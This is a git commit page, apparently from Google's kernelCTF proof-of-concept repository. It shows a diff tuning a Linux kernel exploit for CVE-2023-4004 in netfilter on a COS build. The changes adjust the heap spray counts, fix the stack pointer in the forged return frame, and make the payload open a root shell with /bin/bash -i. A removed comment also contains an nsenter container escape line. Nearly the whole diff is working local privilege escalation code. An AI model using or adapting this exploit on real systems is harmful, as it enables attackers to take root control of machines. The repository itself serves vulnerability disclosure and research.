Change cos exploit

google · Sep 12, 2023 · 234f31c · 234f31c
1 parent cc583e8
commit 234f31c
Show file tree

Hide file tree

Showing 2 changed files with 9 additions and 9 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit
diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/exploit.c
@@ -56,10 +56,10 @@ static void save_state() {
 
 
 void shell(){
-	printf("ret2usr success! uid : %d\n",getuid());
-	//char *args[] = {"/bin/bash", "-c", "nsenter --target 1 -m -p;/bin/bash",NULL};	
-  	char *args[] = {"bin/bash","-i",NULL};
-	execve(args[0], args, NULL);
+	//printf("ret2usr success! uid : %d\n",getuid());
+
+	char *args[] = {"/bin/bash", "-i", NULL};
+  	execve(args[0], args, NULL);
 }
 
 int nl_callback_find_target_table(struct nl_msg* recv_msg, void* arg)
@@ -204,11 +204,11 @@ int leak_info(struct nl_sock * socket){
     new_setelem(socket,SET_TABLE,set_name,a,0x88+3);
     elem_flush(socket,SET_TABLE,set_name);
     puts("Start spray tables");
-    spray_tables(socket,0x600, a, 0xd8);
+    spray_tables(socket,0x400, a, 0xd8);
     puts("Finish spray tables");
     elem_flush(socket,SET_TABLE,set_name);
     puts("Start spray objects");
-    spray_objects(socket, 0x600);
+    spray_objects(socket, 0x400);
     puts("Finish spray objects");
 
     nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_table, NULL);
@@ -276,18 +276,18 @@ int jump_to_rop(struct nl_sock * socket){
     *(uint64_t *)&ops[0xc0] = (uint64_t)shell;
     *(uint64_t *)&ops[0xc8] = user_cs;
     *(uint64_t *)&ops[0xd0] = user_rflags;
-    *(uint64_t *)&ops[0xd8] = user_rsp|8;
+    *(uint64_t *)&ops[0xd8] = user_rsp;
     *(uint64_t *)&ops[0xe0] = user_ss;
     new_set(socket,SET_TABLE, set_name, NFT_OBJECT_CT_EXPECT);
     new_setelem(socket,SET_TABLE,set_name,a,0x88+3);
     elem_flush(socket,SET_TABLE,set_name);
 
     puts("Start spray tables");
-    spray_tables(socket,0x600, a, 0xd8);
+    spray_tables(socket,0x400, a, 0xd8);
     puts("Finish spray tables");
     elem_flush(socket,SET_TABLE,set_name);
     puts("Start spray objects");
-    spray_objects_with_udata(socket, 0x600, ops, 0x100);
+    spray_objects_with_udata(socket, 0x400, ops, 0x100);
     puts("Finish spray objects");
 
     nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_table, NULL);